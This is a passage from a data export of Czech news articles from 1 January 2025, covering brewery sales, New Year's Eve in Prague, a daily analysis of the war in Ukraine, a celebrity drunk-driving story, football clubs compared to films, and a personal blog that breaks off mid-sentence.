    <t>Obliba piva Bernard roste. Prodalo se ho nejvíce v historii Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Dne 1. 1. 2025 Ekonomika , Pelhřimovsko , Zprávy 138 Zobrazení Rodinný pivovar Bernard v roce 2024 vystavil 419 tisíc hektolitrů piva , nejvíce za 33 let existence. Je to o deset tisíc hektolitrů více než v předchozím roce. Produkce pivovaru jde proti vývoji na trhu, kde prodej piva dlouhodobě postupně klesá. Dvě třetiny piva Bernard vyčepují restaurace a hospody ze sudů, třetina se prodá v lahvích, přitom na českém trhu je poměr opačný. „Každý rok se vypořádáváme s dalšími překážkami, od covidu přes skokové nárůsty cen energií a surovin, válku na Ukrajině , zvýšení daní, nekončící bujení administrativy až po povodně, jejichž dopad jsme také pocítili. Přesto se nám daří růst. Nemáme to zadarmo, je za tím píle a poctivá práce. Proto nás opravdu těší, že si naše pivo vybírá stále více lidí,“ hodnotí vývoj generální ředitel a vrchní sládek Josef Vávra . Josef Vávra a Stanislav Bernard „Od počátku usilujeme o co nejvyšší kvalitu piva a služeb a naše snaha přináší výsledky. Věřím v poctivou práci a dobré vztahy s obchodními partery a zákazníky. Má smysl jít vlastní cestou v marketingu a mít schopné obchodníky, kterým se daří nacházet nová odbytiště, i když řada provozoven v posledních letech padla,“ ohlíží se za uplynulým rokem také spolumajitel pivovaru Stanislav Bernard , podle kterého se aktuálními výsledky pivovar přiblížil na hranu svých kapacit. Růst pozastavil pouze covid Výstav Rodinného pivovaru Bernard se kontinuálně zvyšuje od roku 2001 (95 tisíc hl). Hranici 400 tisíc hektolitrů se mu podařilo přesáhnout poprvé v roce 2019, v následujících letech ovšem přišel pokles prodeje v důsledku opatření proti šíření covidu a zavírání hospod. V roce 2022 byl výstav pivovaru bezmála 398 tisíc hektolitrů, v roce 2023 už 409 tisíc hektolitrů piva . Rodinný pivovar Bernard sídlící v Humpolci na Vysočině exportuje 21 procent své produkce do 25 zemí světa, nejvíce na Slovensko , do Švédska a do Bulharska . Zaměstnává 267 lidí, dalších 28 osob má práci v humnové Sladovně Bernard v Rajhradě u Brna . V roce 2022 pivovar otevřel ve svém areálu Návštěvnické centrum Bernard . V roce 2024 se v soutěži Společnosti přátel piva stal už poosmé pivovarem roku. Autor: Radek Tulis Autor person Radek Tulis Rubrika transition_slide Ekonomika</t>
  </si>
  <si>
    <t>20250101_69_3697224735_12079038f0cfc1751284.html</t>
  </si>
  <si>
    <t>12079038f0cfc1751284</t>
  </si>
  <si>
    <t>Zlom silvestrovských oslav nastal ve 23:50. Opilí Italové se ukázali světu</t>
  </si>
  <si>
    <t>Zlom silvestrovských oslav nastal ve 23:50. Opilí Italové se ukázali světu REPORTÁŽ: Poslední den roku 2024 sledovalo hned několik reportérů serveru PrahaIN.cz. Přes den jsme si všímali nejen davů v oblíbených částech metropole, ale také výrazných front v nákupních centrech. To se ostatně dalo čekat. Večer už patřil hlavně oslavám, tedy rachejtlím, ohňostrojům a téměř povinné konzumaci alkoholu . Podle toho to taky vypadalo. Asi největším překvapením pro nás bylo, že většina až nepochopitelného dění probíhala bez jakéhokoli dohledu policejních složek, na což si několik zahraničních turistů vyloženě stěžovalo. Chvílemi se totiž báli, co se může přihodit. Pojďme se tedy ještě jednou vrátit k dění v centru našeho hlavního města 31. prosince 2024. Staroměstské náměstí bylo na úterní silvestrovské oslavy zaplněné převážně zahraničními turisty tak, že přejít z jednoho konce na druhý trvalo téměř půl hodiny, a to jsme se opravdu snažili. Okolo Šalounova Pomníku mistra Jana Husa probíhal příjemný hudební program a Staroměstskému náměstí stále dominovaly půvabné vánoční trhy, o nichž jsme psali už mnohokrát . O úklid nepořádku se téměř bezchybně starala služba. Veškeré odpadky byly srovnané v černých pytlích okolo košů. Na místě nebyl žádný viditelný nepořádek. Tuto činnost musíme jednoznačně chválit. Zhruba deset minut před příchodem nového roku v poklidné povánoční atmosféře nastal radikální zlom. Nad Staroměstským orlojem se spustila kanonáda rachejtlí a salvy ohňostrojů, které si většina přítomných natáčela na mobilní telefony. Skupina silně podnapilých italských turistů ve svých oslavách ovšem zašla ještě o něco dál. Několik krabic se zábavní pyrotechnikou skončilo položených na zemi v blízkosti orloje a část Staroměstského náměstí se na několik minut proměnila doslova ve vybuchující minové pole, ze kterého létaly rachejtle všemi možnými směry. Až asi po deseti minutách na místo přispěchali udivení policisté a začali hasit několik hořících krabic se zbytky pyrotechniky. Italové se jim smáli do očí. Zhruba ve čtvrt na jednu začaly davy turistů hromadně opouštět Staroměstské náměstí . Problém však byl v tom, že se jich do úzkých uliček nahrnulo příliš mnoho. Do toho na náměstí z druhé strany stále přicházeli noví a noví turisté a davem dokonce zkoušelo projet auto. To vše opět bez jakékoli asistence policie. Dvě Němky se nás zeptaly, jestli zde vládne anarchie. „Ne, také to moc nechápeme,“ odpověděli jsme. Obe ženy byly střízlivé a z oslav si podle vlastních slov odnesly leda strach o život. V Karlově ulici potom nastal zcela nekontrolovatelný chaos, opět bez policejního dozoru. Jako nepříliš dobrý nápad se ukázalo přijet na místo novoročních oslav s kočárkem, ve kterém bylo malé dítě. Ten museli někteří kolemjdoucí zdvihnout a přesouvat nad pohybující se masou. Aby toho nebylo málo, tak nad hlavami turistů někdo střílel zbytky ohňostroje. Atmosféra byla nepříjemná i pro nás, organizačně můžeme hovořit o totálním fiasku. Centrum města rázem zaplnily hromady odpadků, vedle nichž na zemi nezřídka seděli bezdomovci a žebráci s nataženými pažemi. Cestou ze Staroměstského náměstí na Václavák dokonce nebyla nouze o to spatřit opilce, které konzumace alkoholu zmohla do té míry, že si ustlali přímo na zemi. Těžko soudit, jestli byly oslavy poklidné či nervózní, nás každopádně překvapilo, což jsme několikrát akcentovali, že si lidé dělali absolutně co chtěli, nikdo jim nic nevytýkal, natož aby měli respekt z uniforem. Takové chování policie bychom čekali spíše někde v rozvojovém světě. A možná ani tam ne. S přispěním Víta Hassana . Autor: Jan Holoubek Autor person Jan Holoubek</t>
  </si>
  <si>
    <t>20250101_7_3698371532_31131121a0ef7d5b4cd5.html</t>
  </si>
  <si>
    <t>31131121a0ef7d5b4cd5</t>
  </si>
  <si>
    <t>Analýza 1043. dne ruské invaze na Ukrajinu 01.01.2025</t>
  </si>
  <si>
    <t>Analýza 1043. dne ruské invaze na Ukrajinu 01.01.2025 ( 2 104 slov, doba čtení 11 minut ) Rusko během silvestrovské noci na ukrajinská města zaútočilo celkem 11 drony Šahed a dalšími neurčenými typy. Podle svodky velení ukrajinských vzdušných sil bylo sestřeleno 63 dronů, dalších 46 se podařilo zlikvidovat pomocí systémů radioelektronického boje, nebo nedosáhly svých cílů. V Kyjevě v důsledku dopadu dronů dva lidé zemřeli, dalších 7 je zraněných. Ruský telegramový kanál Typičnij Kursk uvádí, že v noci došlo k ukrajinskému raketovému úderu do Belovského rajonu Kurské oblasti, nejsou však známy bližší informace. Letiště v Saransku (Mordvinská republika v Rusku ), Penze (Penzenská oblast), Kaluze (Kalužská) a Saratově (Saratovská) přerušila provoz kvůli obavám z ukrajinských dronů. Likvidace ruské pěchoty na Pokrovském směru v podání operátorů dronů 425. samostatného útočného praporu Skala Neplecha v Rusku : Podle ukrajinského OSINT kanálu Kiberborošno byl na lgovském nádraží zasažen podzemní bunkr, který zde byl podle historie satelitního snímkování Google budován zhruba od roku 2018. Zda je to pravda a jaké jsou skutečné škody není stále dost dobře jasné, ale snímkování nelze vyložit jinak. Co se týče situace na frontě, dnes nejsou prakticky žádné nové informace z ukrajinské ani ruské strany. Předpokládáme však pokračující boje u Darina na západě, Kruglenkova na severozápadě a v prostoru kolem Sudži, na linii Čerkasská Konopelka – Agronom. Operátoři dronů 18. Slovanské brigády NGU v Časiv Jaru likvidují ruské sklady munice Severovýchodní fronta: Podle ukrajinského projektu Deepstate dochází ke zvyšování ruského tlaku v Ternách , kde se okupační síly snaží vytvořit předmostí na pravém břehu Žerebce. Podle kanálu dochází v tomto ohledu především k pěším útokům (důvodem může být úzký prostor, který je nutné překročit, což by vytvořilo pro techniku smrtící past). Popis Deepstate tvoří zajímavou kombinaci ruských a ukrajinských zpráv, a rezonuje s tím, co jsme napsali včera. Příslušníci praporu K-2 54. samostatné mechanizované brigády popisují, že Rusové se neobtěžují sbírat své mrtvé a raněné po útocích kolem Bilohorivky a Vjimky, což ilustrují záběry mrtvol z útoku, který proběhl 14. prosince. Příslušníci praporu K-2 pak dnes zveřejnili dlouhé video s komentářem, podle kterého se jim podařilo ubránit pozice kolem Verchnokamjanského ( geolokalizace některých záběrů v 1. polovině). Video ukazuje, že se jednalo o velký kombinovaný úder, pravděpodobně s cílem u této vesnice prorazit, čítající několik desítek vozidel, podporu salvových raketometů a obrněné techniky. Ukrajinci pak přímo u Verchnokamjanského provedli protiútok, po kterém byla technika okupantů nucena ustoupit. Bachmutská fronta: Z Časiva Jaru se konečně objevila geolokalizovaná videa coby důkaz ruského postupu do sídliště Pivničnyj. Nejedná se o nový postup, okupanti jsou zde již několik dní a už jsem o něm informovali. Kromě toho se okupanti stále snaží dostat do areálu továrny na výrobu žáruvzdorných cihel, z videí je však zřejmé, že zde mají těžké ztráty (geolokalizace: čas 0:14 – 0:26 ; 0:48 – 0:55 ). Doněcká fronta: V okolí Torecku a Nelipivky pokračují Rusové v zesilování tlaku. Boje nyní probíhají jihozápadně od terrikonu číslo 10, což ukazuje na další postup okupantů směrem na západ. Na severu a jihu města jsme nový postup okupantů nezaznamenali. Jak ukazují geolokalizované záběry, Rusové obsadili Vozdvyženku. Počítáme s tím, že se odtud budou okupanti snažit prorazit z východu k Pokrovsku a přerušit silnici na Kosťantynivku. Více na západ pak podle ukrajinského projektu Deepstate okupanti postupují v Solone a západně od Vovkova. Ruský milbloger Radov tvrdí, že Rusové dobyli Dačenske, což sice není možné potvrdit, ale vzhledem k situaci na tomto úseku pravděpodobnost existuje. Jak je však vidět z mapky, Ukrajinci zde mají vybudované poměrně velké obranné pozice, které by jim mohly pomoci případné ruské předmostí oddálit. Přes vesnici vede hlavní silnice, směřující přímo do Pokrovska, očekáváme, že půjde o místo, kde se budou okupanti snažit dosáhnout postupu za každou cenu. Most přes Solonu, po kterém silnice vede, byl zničen, jak ukazují satelitní snímky z října 2024. V Kurachovém se obránci stáhli z většiny areálu místní tepelné elektrárny Elektrostal a město je nejspíše pouze pár dní před celkovým dobytím. Okupanti jsou nyní v západní části areálu elektrárny a obránci drží odhadem zbývající část průmyslové zóny a jižní předměstí jsou nejspíš také pod kontrolu ukrajinských ozbrojených sil. Je pravděpodobné, že brzy dojde k ústupu ukrajinských obranných sil na celém Kurachovském výběžku, který přestává dávat smysl držet. Ukrajinský výsadkář, vystupující na Telegramu pod přezdívkou Mučnoj, tvrdí, že Ukrajinci jsou sice ve městě stále přítomni, ale doufá “že se odtud dostanou,” což naznačuje, že se Ukrajinci v dohledné době skutečně stáhnout mohou, nebo že již dokonce probíhá, což by odpovídalo silnému ostřelování, které jsme mohli vidět včera. Popis situace od Deepstate a ruských milblogerů je v poměrně vzácné shodě. Krym : Ruské aviatické kanály hlásí, že Ukrajincům se během včerejšího útoku hladinových dronů podařilo sestřelit ne jeden, ale rovnou dva ruské vojenské vrtulníky. Ačkoliv jsme měli z ruských kanálů potvrzení sestřelu jednoho, dnes kanály napojené na ruské letectvo hlásí, že k zemi šly oba stroje, na které Ukrajinci zaútočili. Unikátní záběry ukrajinského Su-25 vypouštějícího AASM-250 Diplomatické a politické události: Od 7:00 1. ledna 2025 Ukrajina oficiálně ukončila tranzit ruského zemního plynu přes své území. O této skutečnosti informovalo ministerstvo energetiky. Podle jejich vyjádření byl tento krok učiněn v zájmu národní bezpečnosti. Ukrajina o svém rozhodnutí informovala mezinárodní partnery podle stanovených postupů. Ministerstvo dále uvedlo, že infrastruktura ukrajinského plynovodního systému byla předem připravená na provoz v režimu nulového tranzitu, a zajistilo spolehlivé dodávky plynu ukrajinským spotřebitelům. „ Rusko přichází o trhy a utrpí finanční ztráty. Evropa se již rozhodla opustit ruský plyn. Evropská iniciativa Repower EU přesně předpokládá to, co dnes Ukrajina realizovala,“ uvedl ministr energetiky Herman Galuščenko. Neobnovení této smlouvy bylo předpokládáno už od února 2022, kdy Rusko napadlo Ukrajinu . Ruskem kontrolované území Podněstří nemůže kvůli ukončení dohody o tranzitu ruského zemního plynu přijímat ruský plyn přes Ukrajinu , což vedlo k přerušení dodávek tepla a teplé vody v této oblasti. Tiraspoltransgaz, společnost zodpovědná za distribuci plynu v mezinárodně neuznaném Podněstří , oznámila, že přerušila dodávky plynu do 12 státních institucí, včetně škol, zdravotnických zařízení a policejních stanic. V tuto chvíli nikdo neví, jak dlouho bude tato situace trvat. Samotného Moldavska se tento výpadek nedotkne, protože už od konce roku 2022 odebírá plyn z evropského trhu. Maďarsko přišlo o možnost získat přes miliardu eur finanční pomoci z EU kvůli porušování zásad právního státu a zpožděním při provádění reforem. Podle Evropské komise , jak uvedla agentura Deutsche Welle , mělo Maďarsko do konce roku 2024 provést reformy zaměřené na dosažení souladu s normami EU, zejména novelizaci zákonů zaměřených na předcházení střetům zájmů a boj proti korupci. Tyto kroky však nebyly uskutečněny, a proto Maďarsko definitivně ztratilo nárok na uvedenou pomoc. Celkem má Budapešť zablokované platby již ve výši přibližně 19 miliard eur (cca 475 miliard korun) z evropských fondů. Připomeňme, že Maďarsko bylo již dříve pokutováno částkou 200 milionů eur Evropským soudním dvorem za opakované porušování pravidel týkajících se azylu. EU také pohrozila, že zemi uloží pokutu ve výši jednoho milionu eur denně, dokud neuvede svou politiku do souladu s právem EU. Na tato opatření reagoval mluvčí maďarské vlády Gergely Gulyás prohlášením, že země je připravena poskytovat nelegálním migrantům jednosměrné jízdenky zdarma – do Bruselu . Dosud nezveřejněný zásah HIMARS na ruský systém protivzdušné obrany Pancir-S1 z počátku tohoto roku Svéráz ®uské ekonomiky: Dnes se zaměříme na dárky, které k novému roku připravila pro své obyvatele ruská vláda. Zlí jazykové by mohli říci, populace Ruska z těchto dárků nebude příliš nadšená, nicméně je potřeba postavit se k této otázce patrioticky, a podpořit ruskou vládu, která se s ohledem na složitou situaci státního rozpočtu rozhodla navýšit sazby u značného množství nejrůznějších daní a poplatků. Jako první uvedeme zdražení jedné ze základních ruských spotřebních komodit, totiž vodky. Zde se projevilo jak zvýšení spotřební daně na alkohol , tak i stanovení nové minimální ceny na tento populární nápoj, která nyní činí 349 rublů za půl litru (tedy přibližně 77 Kč) oproti 299 rublům v minulém roce. Podobně zdražil i další vysokoprocentní alkohol , například minimální cena koňaku je nyní 651 rublů za půl litru (oproti 556 rublům), u brandy došlo ke zvýšení ze 403 na 472 rublů. Došlo také ke zdražení piva , zde byla zvýšena spotřební daň z 27 na 30 rublů za litr tohoto nápoje. Spotřební daň u cigaret byla zvýšena pouze o 4,6%, tedy ze 129 na 135 rublů za krabičku, a k obdobnému navýšení došlo u dalších tabákových výrobků. Zdražení se ale dotklo i celé škály dalších potravin, například u sycených nealkoholických nápojů vzrostla spotřební daň ze 7 na 10 rublů za litr, což se promítne na obdobném zvýšení jejich ceny. Spotřební daň byla dále zvýšena u pohonných hmot, u benzínu 95 byla zvýšena o přibližně 9%, u motorové nafty o 11%. Dále vzrostlo clo na importované osobní automobily, a to až o 38% v závislosti na modelu – zde je ovšem výjimka, u nejdražší kategorie osobních automobilů s prodejní cenou přes 10 milionů rublů (tedy přes 2,2 miliony Kč) se zvýšení dovozního cla nedotkne. Zvýšen byl také recyklační poplatek, a to v závislosti na modelu přibližně 20%. Připomeňme, že recyklační poplatek ani dovozní clo se netýká domácí automobilky Lada, tyto kroky lze tak chápat jako snahu o podporu tohoto v posledních letech skomírajícího výrobce automobilů. Zdraží také povinná technická kontrola, a to přibližně o 7%, a dále výpisy z katastru nemovitostí, a to o rovných 100%. Vzhledem nestabilnímu kurzu ruského rublu lze také předpokládat znatelné zdražení veškerých importovaných potravin, ale také ostatního spotřebního zboží. Vidíme tak, že ruská vláda přenáší stále větší část nákladů spojených s pokračující invazí na Ukrajinu na své obyvatele, což nutně povede k dalšímu zhoršení jejich situace. Izraelské letectvo zasáhlo během prosince více než 1 400 cílů v Pásmu Gazy Situace na Blízkém východě : Izrael : Při plnění bojových operací v jižní části pásma Gazy se vojákům z brigády Kiryat podařilo objevit továrnu na rakety. Továrna patřící Hamásu byla objevena při zajišťování oblasti jižně od Rafáhu. Na místě byly objeveny rakety delšího a středního doletu, společně s další vojenskou výzbrojí. Továrna a rakety byly následně ženisty zničeny. Jednoho lehce zraněného si dnes vyžádal pokus o teroristický útok ve městě Dair Kadis, na západním břehu. Podle vyjádření IDF se palestinský útočník rozjel plnou rychlostí na vojáky IDF, operující v tu dobu ve městě. Po neúspěšném útoku se útočník pokusil z místa ujet, přičemž na něj byla příslušníky IDF zahájena palba, která jej zastavila. Útočník byl vzat do vazby a v současné době se nachází ve vážném zdravotním stavu. Bližší informace k případu IDF zatím neposkytla. Libanon : Skladiště zbraní a vozidlo Hizballáhu byly zničeny Izraelským letectvem (IAF) při náletu v jižním Libanonu . Skladiště sloužilo k distribuci zbraní jednotkám Hizballáhu a útok na něj přišel poté, co v něm byla zaznamenána aktivita. Jednalo se tak o porušení podmínek příměří. Přesný počet operativců zabitých při náletu nebyl dosud IDF uveden. Sýrie : Členům bojových jednotek kurdské strany pracujících ( PKK ) se při dnešních bojích s Tureckem podporovanými milicemi (SNA) podařilo sestřelit dron tureckého letectva Bayraktar TB2. Jaká zbraň byla při sestřelu použita nebylo uvedeno. Znamená to ale, že Kurdové disponují nějakou formou protivzdušné obrany, než se původně předpokládalo. Aktivní jsou i nadále dronaři kurdských jednotek, kteří hlavně na Manbídžské frontě zaznamenávají úspěchy. I přes to se Kurdům i nadále nedaří prolomit obranu SNA kolem města. Dnešní Třešnička™ se nebude líbit anti-vaxxerům. Jedna starší dezinformace šířená proruskými/antisystémovými weby už kolem první dekády tohoto milénia tvrdí, že obyčejné očkování (spalničky, příušnice, zarděnky) nejenže je neúčinné, ale má dokonce mnohem horší vedlejší účinky, jako třeba autismus u dětí. I když byl tento hoax vyvrácen už před jeho širším rozšířením na internet (pro klid duše uvedeme, že autismus je výsledkem složité interakce genetických a environmentálních faktorů), dobře si pamatujeme často vzdělané lidi, kteří nás přesvědčovali o tom, že tyto vážné, až smrtelné choroby, se podařilo vymýtit mytím rukou, a očkování je jen big byznys. V době pandemie Covidu-19 většina z těchto lidí, co je nám známo, dobrovolně nosila roušky a očkovat se nechala, což mohlo být dílem strachu, snad i prozření. To však není podstatné a na omluvě vyloženě netrváme. Svou práci, ale už tehdy vykonávali “tajně” očkovaní bojovníci proti vakcíně, olizovačky klik a další pošuci, kteří mohli být dávno zapomenutí, kdyby v únoru 2022 ladně nepřeskočili na otevřené podporování Ruska . Nyní by však mělo dojít k logickému paradoxu a explozi jejich hlav, protože ruští vědci nejen že rozdojili kozla, ale také údajně vyrobili vakcínu proti rakovině. I když západní medicína už zná způsoby jak stimulovat imunitní systém nebo ochránit pacienty proti infekcím způsobujícím rakovinu, Rusové tvrdí, že mají lék proti rakovině jako takové. Navzdory tomu, že tento “přelomový” výzkum “financovaný na vládní příkaz” by měl být jen upravenou mRNA vakcínou, která prý pomůže tělu rozpoznat rakovinné buňky, problém je v tom, že se vědci shodují, že to nelze provést nějak “univerzálně”. Ono totiž nejde o takovou novinku. Vědci s touto variantou léčby operují intenzivně už od Covidu, problém ale je v tom, že se Rusové chvástají, že už během několika měsíců začnou léčit své pacienty. A to doslova bůhvíčím. Dosud totiž neposkytli žádný důkaz, že takovou zbraň proti vážné nemoci mají. Jestli je to propaganda nebo hazard si netroufáme říct – asi jako vše Ruské. Pomoci nám s naší tvorbou můžete malým příspěvkem na kávu, nebo si předplatit Patreon a podporovat nás dlouhodobě. Děkujeme všem, za jakýkoliv příspěvek, moc si toho vážíme. Publikováno – Kolektiv valka.online Záložky Interview (3) Ženy (8) Námořnictvo (22) Životní osudy (39) Letectvo (40) Bitva (47) Zbraně (65) Armáda (75) Aktualita (984) Válka (1 082) O nás Stránka věnovaná aktuálním i historickým konfliktům, zbraním i osobnostem. Každodenní OSINT analýzy ukrajinského bojiště. Najdete nás Autor: Kolektiv valka.online Rubrika transition_slide Aktuální konflikty</t>
  </si>
  <si>
    <t>5200</t>
  </si>
  <si>
    <t>6130</t>
  </si>
  <si>
    <t>20250101_70_3697282665_f2d8e3d4fdffb7bc0025.html</t>
  </si>
  <si>
    <t>f2d8e3d4fdffb7bc0025</t>
  </si>
  <si>
    <t>Vilma Cibulková odsouzená za řízení v opilosti: Závislosti podlehla i dcera!</t>
  </si>
  <si>
    <t>Vilma Cibulková odsouzená za řízení v opilosti: Závislosti podlehla i dcera! Sklony k závislosti se dle výzkumů dědí i v genech, a zvlášť po matkách! A tak herečka Vilma Cibulková (61), která o svátcích odjela ze Slovenska s flastrem kvůli jízdě v opilosti, »zařídila« dobrodružný život i své dceři Šimoně (31). Její příběh má ale šťastný konec! Léta se o Šimoně Rychtaříkové (31) vědělo jen to, že byla závislá na pervitinu, a když ji máma v roce 2012 vyhodila z domu, skončila jako bezdomovkyně. Profetovaná léta a napjaté vztahy v rodině jsou už ale dávno hudbou minulosti. Vilma Cibulková , která v životě vytrvale bojuje se závislostí na alkoholu , je momentálně na svou jedinou dceru moc pyšná! Nejenže se Šimona – prakticky sama a bez pomoci rodičů – po několikrát opakované léčbě v Bohnicích konečně vysekala ze závislosti na drogách, ale dodělala si i univerzitu a rozjela vlastní podnikání! Ze samého dna společnosti se vypracovala na paštikovou královnu! „Minulé léto jsme měly přenádherné, protože Šimonka rozjížděla vlastní podnik a začala vyrábět i prodávat vynikající paštiky. Dneska už má skoro padesát druhů paštik. A všechno je to vyrobené přírodním způsobem, z padesáti procent pečeného masa a spousty bylinek,“ vyprávěla s hrdostí herečka Blesku. „Je to nedostižný, co jí kvete pod těma rukama,“ pěla ódy na Šimonu, kterou má z prvního manželství s právníkem Zbyškem. Své dceři se herečka snaží s byznysem i pomáhat. „Minulé léto jsme spolu objížděly všechny možné trhy. Řídila jsem nákladní auto a dělala jsem jí i bedňáka. Vykládala jsem zboží, a když už jsem tam byla, tak jsem i mazala chleby,“ popsala herečka, která s dcerou vyjížděla prakticky každý víkend na nejrůznější akce, kde pak dvanáct hodin prostála u stánku. „To bylo tak překrásné léto! Dostala jsem se do míst, kam by mě normálně nenapadalo vyjet. Připadala jsem si jako s kočovným divadlem,“ usmívala se Cibulková . S temnou zimou ale do problémů zahučela pro změnu ona... Dvě promile za volantem Cibulková , která má v minulosti za sebou dvouletou protialkoholní léčbu v Bohnicích , měla před Vánocemi problémy na Slovensku : Kvůli jízdě v opilosti strávila dva dny v cele předběžného zadržení! Nadýchat měla dvě promile. Byť Blesku vysvětlila, že se vše odehrálo »jen« v areálu nemocnice před oddělením geriatrie, kde měla na žádost rodiny vyprovodit osobu jí blízkou na poslední cestě, od sousedů nakonec odjela s dvouměsíční podmínkou, pokutou v přepočtu 75 000 korun a tříletým zákazem řízení! Herečka si také postěžovala, že výši pokuty policie stanovila podle jejího platu. Kisa Císařová, Lukáš Červený Mrazivé přiznání Vilmy Cibulkové : Dvakrát bojovala o život! Pokaždé šlo o minuty Foto: J. Koťátko, Profimedia.cz profimedia.cz archiv Blesku Foto: TV Markíza, archiv Blesku Blesk:FOTO: Jiří Koťátko / CNC Foto: D. Kundrát, M. Hykl Blesk:Martin Hykl/ CZECH NEWS CENTER CNC / Martin Hykl Jiří Koťátko Blesk:CNC / Pavel Machan Vilma Cibulková odsouzená za řízení v opilosti: Závislosti podlehla i dcera! 2006: Vilma Cibulková s dcerou a s druhým manželem Miroslavem Etzlerem Vilma Cibulková Šimona Rychtaříková v době, kdy měla problémy Šimona Rychtaříková se léčila ze závislosti na pervitinu. Záběry z převozu Vilmy Cibulkové k soudu zveřejnila slovenská média. Vilma Cibulková v ateliéru Jakuba Ludvíka Miroslav Etzler a Vilma Cibulková Miroslav Etzler Anděl mezi zdravotníky – Miroslav Etzler a za ním Vilma Cibulková Anděl mezi zdravotníky - David Novotný pomáhal Vilmě Cibulkové Anděl mezi zdravotníky - Vilma Cibulková Během rozhovoru s redaktorkou Blesku Kisou Císařovou. Neviditelný herec století: Vilma Cibulková Autor: Kateřina Štichová Autor person Kateřina Štichová Rubrika transition_slide České celebrity</t>
  </si>
  <si>
    <t>20250101_71_3697284963_c8a799e0fa51c1f2118b.html</t>
  </si>
  <si>
    <t>c8a799e0fa51c1f2118b</t>
  </si>
  <si>
    <t>Sparta jako Chlast. Které filmy nejlépe vystihují fotbalové kluby?</t>
  </si>
  <si>
    <t>Sparta jako Chlast . Které filmy nejlépe vystihují fotbalové kluby? 01. leden 2025 Sdílejte: Vybraným klubům hledáme výstižný filmový ekvivalent reflektující ať už jejich současné rozpoložení, historii nebo jejich v kulturní paměti zarytý obraz. Dozvíte se třeba, co spojuje Karla Gotta a Slavii . Momentka z filmu Chlast . Foto: Nordisk Film Sparta - Chlast Mistrovské opojení pražské Sparty v posledních měsících vystřídala tvrdá kocovina. Klub si na podzim vedl jako na houpačce. Jeho cesta do jisté míry lícuje osudy hrdinů dánského filmu Chlast , kteří experimentují s alkoholem v krvi za denního režimu, aby dosáhli lepších osobních i pracovních výsledků. Film krásně a bez moralizování ukazuje, jak rychle lze v euforickém oparu spadnout zpátky na dno. Životní kolísavost a nestálost odvíjející se od stimulovaného sebevědomí se může krutě vymstít. Slavia - Hvězda padá vzhůru Jeden z nejhorších socialistických filmů. Karel Gott v ústřední roli bizarní adaptace Švandy Dudáka s názvem Hvězda padá vzhůru s nadsázkou připomíná letošní počínání Slavie . Doma klub dominuje a drží se na vrcholu, v Evropské lize padá strmě dolů. Zatímco Švanda svou před kapitalismem varující propagandistickou pouť končí zjištěním, že doma je nejlépe a lokální úspěchy jsou důležitější než snaha o zahraniční pozlátko, tým Jindřicha Trpišovského se snad co nejdřív vzchopí a o své evropské místo ještě zabojuje. Real Madrid - Boj o moc Bezkonkurenční král Ligy mistrů se vznešenou tradicí. Klub, u kterého si už víc než dekádu říkáme, že se přece musí dřív nebo později propadnout. A stále se tak neděje. Matadoři, kteří tým dovedli k poháru před víc než deseti lety jej k němu dovedli i letos. Na snad nejtradičnější klub vůbec si však neustále brousí zuby ostatní. Je první na ráně. Výsostné postavení Realu připomíná Logana Roye ze seriálu Boj o moc. Starého patriarchu, jenž vybudoval největší zábavní park v USA . Když už to vypadalo, že odejde do důchodu a předá žezlo rodině, rozhodl se opět útočit a v křesle zůstat. Minimálně v této zarputilosti a dlouhověkosti si s Realem mohou podat ruce. A stejně tak i v tom, že uhájit si trůn se v ostré konkurenci mění v boj o život. Manchester United - Sunset Boulevard Bohatá historie, nejvíc titulů v anglické lize a dominantní etapa pod Alexem Fergusonem . Za posledních víc než 10 let jsou však vzpomínky na zlatou éru tím jediným, co mají fanoušci Manchesteru United k dispozici. Dřívější relevanci střídá vyčpělost a frustrace. Stejné pocity zažívala i Norma Desmond v noiru Sunset Boulevard. Kdysi nejzářnější hvězda němé éry po nástupu zvuku stejně jako řada dalších vyhasla. Stále se udržuje v iluzi dokonalé minulosti. Ta už je však dávno pryč a snaha o adaptaci na měnící se průmysl připomíná temnotou opředený boj s větrnými mlýny. Zajímá vás, jaké filmy pasují k Manchesteru City, Arsenalu , PSG nebo Leverkusenu ? Pořiďte si webové předplatné Football Clubu a čtěte celou verzi textu. Autor: Redakce FC</t>
  </si>
  <si>
    <t>10020</t>
  </si>
  <si>
    <t>28110</t>
  </si>
  <si>
    <t>20250101_72_3697112467_9b0dc8894e32f7c3b317.html</t>
  </si>
  <si>
    <t>9b0dc8894e32f7c3b317</t>
  </si>
  <si>
    <t>kOmický blog DXXXVI.</t>
  </si>
  <si>
    <t>kOmický blog DXXXVI. S přibývajícím věkem dětí i rodičů se značně proměňuje charakter společenských setkání i jejich intenzita. Manžel produkující dříve i čtyři akce do měsíce nečekaně podřadil na výrazně nižší rychostní stupeň, starší potomci naopak četnost svých aktivit předvídatelně navýšili. Můj pokus o rodinnou oslavu v restauraci dopadl zvláštně. Jakkoli den mých narozenin připadl na pátek a rodinný kalendář nehlásal plánovanou nepřítomnost nikoho z mých blízkých. Myšlenka byla především dopřát dětem zážitek odlišný od obvyklého závodu obžerství v running sushi. Dobu čekání na menu pro pět osob jsem se snažila vyplnit konverzací, leč odpovědi rodinných příslušníků sestávaly výhradně z holých vět. Konzumace je pak zaměstnala především snahou urvat pro sebe co nejvíce a tatínek celou situaci završil dvacetiminutovým telefonátem. Příště zvolím raději dříve osvědčenou společnost kamarádek. Manžel s překvapivým úsilím o oslavu dopadl ještě hůře, neb v předvánočním období měl volné večery snad jen nejmladší potomek. Upřímně přiznávám, že jsem s nahořklým dojmem z vlastních narozenin nepociťovala příliš výčitek, když jsem v jeho velký den přijala nabídku na tradiční brigádu. Průběh silvestrovských oslav jsem zvědavě očekávala. Muž chvíli prohlašoval, že nic neslavíme a nikam nejdeme. Po letech téměř povinného veselí bych tuto zkušenost uvítala. Především v situacích, kdy jsme trávili večery v restauraci, kde se choť výborně bavil, zatímco já vláčela v rukou batole až dvě. Při posledním Silvestru tohoto typu se mě už ani nenamáhal kolem půlnoci vyhledat, což dosti ochladilo můj vztah k oslavám i manželovi. V tomto ohledu jsme byli překvapivě zachráněni pandemií, která pořádání podobných akcí razantně utnula. Ke konci roku se drahý choť začal hlasitě zabývat myšlenkou na společenská setkání v průběhu posledního dne roku. Překazil tím sice plány našich starších dětí, které by nám rády dopřály pobyt mimo domov, aby zde mohly uspořádat vlastní večírek. Nakonec si ovšem zajistily vlastní náhradní program. A v duchu tatínkova návrhu se u nás doma během silvestrovského odpoledne 